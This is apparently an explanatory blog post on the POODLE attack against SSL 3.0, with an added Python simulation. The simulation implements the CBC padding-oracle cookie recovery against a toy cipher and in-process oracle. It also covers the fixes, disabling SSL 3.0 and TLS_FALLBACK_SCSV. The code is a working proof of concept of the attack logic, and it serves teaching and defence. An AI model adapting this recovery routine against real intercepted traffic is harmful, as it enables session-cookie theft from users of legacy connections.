
Relying on SSL 3.0? The POODLE attack can rip it apart!

Three Google researchers, Bodo Möller, Thai Duong and Krzysztof Kotowicz, have uncovered a security bug in widely used web encryption technology that could allow an attacker to steal data in what they have dubbed the “POODLE” attack.

“POODLE” stands for Padding Oracle On Downgraded Legacy Encryption.

The problem is an 18-year-old encryption standard, SSL 3.0, which is still supported by almost every web browser and by many websites. It was disclosed on Tuesday, 14 October 2014, in a short paper released through Google’s Online Security Blog (see the reference below) and is tracked as CVE-2014-3566.

Unlike many other attacks on TLS and SSL, POODLE has nothing to do with the certificate trust model in the protocol. It targets the way SSL 3.0 pads and checks CBC-mode records. Each record is MACed, then padded up to the cipher’s block size, then encrypted; on decryption the server reads only the final padding-length byte and never checks the padding bytes themselves. An attacker who can see and alter the victim’s encrypted traffic, and who can get JavaScript running in the victim’s browser to fire off many HTTPS requests of chosen length, copies a ciphertext block containing one unknown byte (for example a byte of the session cookie) into the position of the padding block. The server accepts the tampered record only when the decrypted padding-length byte happens to come out right, which occurs once in 256 attempts on average, and every acceptance reveals one plaintext byte. Roughly 256 requests per byte are therefore enough to recover an entire HTTPS cookie. Cookies flagged Secure and sites that use HTTP Strict Transport Security are not protected, because the attack decrypts the HTTPS traffic itself rather than tricking the browser into sending the cookie in the clear. Modern clients normally negotiate TLS 1.0 or newer, but because browsers retry with older protocol versions when a handshake fails, the same man-in-the-middle can force the “downgrade” to SSL 3.0 that gives the attack its name.

To do that, however, the attacker must launch a “man-in-the-middle” attack, placing themselves between the victim and the websites they are visiting. One common approach is to set up a rogue WiFi “hot spot” in an Internet cafe, which also gives the attacker an easy way to inject the script into any plain-HTTP page the victim loads. The fix is to disable SSL 3.0 on servers and in browsers; servers and clients that implement TLS_FALLBACK_SCSV additionally stop a man-in-the-middle from forcing the downgrade.
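As an added illustration (not code from the original post or from the Google researchers), the following Python simulation models the SSL 3.0 CBC padding check described above and runs the byte-at-a-time recovery against it. The block cipher is a toy Feistel network standing in for AES or 3DES (the attack depends only on CBC chaining, not on the cipher), the keys, request template and cookie are constructed for the example, and the attacker is assumed to know the cookie’s length and its position in the request, which the injected script gives them in practice.

```python
import hashlib
import hmac
import os

BLOCK = 16                  # toy cipher block size (AES-sized; 8 works the same way)
HALF = BLOCK // 2
MAC_LEN = 20                # HMAC-SHA1, as in SSL 3.0 cipher suites
MAX_TRIES_PER_BYTE = 20000  # expected ~256; the cap only guards against a broken oracle

# Constructed request template. Injected JavaScript lets the attacker choose the
# lengths of `path` and `body`; the cookie is the secret being recovered.
REQ_HEAD = b"POST /"
REQ_MID = b" HTTP/1.0\r\nCookie: "
REQ_TAIL = b"\r\n\r\n"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    """Feistel round function: keyed hash truncated to a half block."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]


def block_encrypt(key, block):
    """Toy 4-round Feistel cipher; any invertible block cipher gives the same attack."""
    left, right = block[:HALF], block[HALF:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def ssl3_seal(enc_key, mac_key, plaintext):
    """Client side, SSL 3.0 style: MAC, then pad, then CBC-encrypt. Returns iv || ciphertext."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = (BLOCK - 1) - (len(body) % BLOCK)    # 0..15 padding bytes, then the length byte
    body += os.urandom(pad_len) + bytes([pad_len])  # SSL 3.0 padding bytes are arbitrary
    iv = os.urandom(BLOCK)  # real SSL 3.0 chains the previous record; a visible IV is equivalent
    out, prev = b"", iv
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(enc_key, _xor(body[i:i + BLOCK], prev))
        out += prev
    return iv + out


def ssl3_open(enc_key, mac_key, record):
    """Server side: plaintext, or None on padding/MAC failure (the oracle).
    The SSL 3.0 flaw: only the length byte is read; the padding bytes are never checked."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    pt, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        pt += _xor(block_decrypt(enc_key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return None
    body = pt[:len(pt) - pad_len - 1]
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, data, hashlib.sha1).digest()):
        return None
    return data


def victim_request(path, body, cookie):
    return REQ_HEAD + path + REQ_MID + cookie + REQ_TAIL + body


def poodle_recover_cookie(cookie_len, send_as_victim, ask_server):
    """Attacker: recover the cookie one byte at a time, ~256 oracle queries per byte.
    send_as_victim(path, body) -> record the victim's browser would send
    ask_server(record) -> not None if the server accepted the (tampered) record"""
    recovered = b""
    for k in range(cookie_len):
        # Choose the path length so cookie byte k is the LAST byte of plaintext block i.
        path_len = (BLOCK - 1 - len(REQ_HEAD) - len(REQ_MID) - k) % BLOCK
        pos = len(REQ_HEAD) + path_len + len(REQ_MID) + k
        i = pos // BLOCK
        # Choose the body length so data + MAC fill whole blocks: the record then ends with a
        # full block of padding whose length byte must decrypt to BLOCK - 1 to be accepted.
        plain_len = len(REQ_HEAD) + path_len + len(REQ_MID) + cookie_len + len(REQ_TAIL)
        body_len = (-(plain_len + MAC_LEN)) % BLOCK
        for _ in range(MAX_TRIES_PER_BYTE):
            record = send_as_victim(b"A" * path_len, b"B" * body_len)
            iv, ct = record[:BLOCK], record[BLOCK:]
            blocks = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]  # blocks[i+1] = C_i
            forged = record[:-BLOCK] + blocks[i + 1]   # swap the target block into the padding slot
            if ask_server(forged) is not None:
                # Accepted, so (P_i ^ C_{i-1} ^ C_prev_last)[-1] == BLOCK - 1.
                recovered += bytes([(BLOCK - 1) ^ blocks[i][-1] ^ blocks[-2][-1]])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return recovered


def demo(cookie=b"session=s3cr3t"):
    """End-to-end run on constructed keys; returns the recovered cookie."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    return poodle_recover_cookie(
        len(cookie),
        lambda path, body: ssl3_seal(enc_key, mac_key, victim_request(path, body, cookie)),
        lambda record: ssl3_open(enc_key, mac_key, record),
    )


if __name__ == "__main__":
    print(demo())
```

The only server-side property the attacker relies on is the single `if pad_len >= BLOCK` check in `ssl3_open`. TLS 1.0 and later additionally require every padding byte to equal the length byte, which is why swapping in an arbitrary ciphertext block is rejected there and the same construction does not work.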

References:

http://googleonlinesecurity.blogspot.com.au/2014/10/this-poodle-bites-exploiting-ssl-30.html
